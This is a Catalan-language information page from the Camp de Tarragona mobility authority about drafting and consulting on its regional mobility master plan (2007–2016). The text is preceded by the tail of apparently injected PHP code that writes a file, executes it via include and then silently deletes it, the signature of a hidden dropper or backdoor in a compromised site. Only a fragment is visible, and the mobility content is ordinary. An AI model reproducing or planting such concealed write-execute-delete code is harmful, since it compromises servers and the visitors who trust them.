");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Informació PDM
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

Informació del PDM

L’elaboració, tramitació i avaluació del Pla Director de Mobilitat del Camp de Tarragona és una de les funcions que corresponen a l’ATM (Autoritat Territorial de la Mobilitat), tal com estableix la Llei 9/2003 de la mobilitat, així com els Estatuts.

A l'octubre de 2007 s’inicià el procés d’elaboració i redacció del Pla Director de Mobilitat del Camp de Tarragona que es preveu sigui aprovat definitivament durant l’any 2009.

La normativa referent a aquest tipus de plans indica la necessitat de garantir tant la participació ciutadana com la participació dels ens locals afectats, de les entitats i organismes de l’àmbit de la mobilitat, i dels departaments de la Generalitat amb competències.

Elaborar un pla compartit i acceptat per tots els afectats i implicats possibilita, en definitiva, integrar els diferents valors i criteris existents enfront a la priorització d’uns valors únics o coneixements tècnics, acceptant el principi d’igualtat en la presa de decisions. El fet d’integrar les diferents visions dels problemes permet, doncs, la construcció col·lectiva de decisions més eficaces i evita l’adopció de solucions imposades que acaben resultant ineficients per no haver detectat les possibles percepcions i alternatives.

El Pla d’estímul de la demanda de transport públic del Camp de Tarragona, aprovat pel Consell d’Administració al 2015, contempla en les actuacions destinades a la millora de la gestió de la mobilitat la redacció del “projecte de PDM”. Aquestes tasques de redacció estan previstes realitzar-se durant 2016.

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona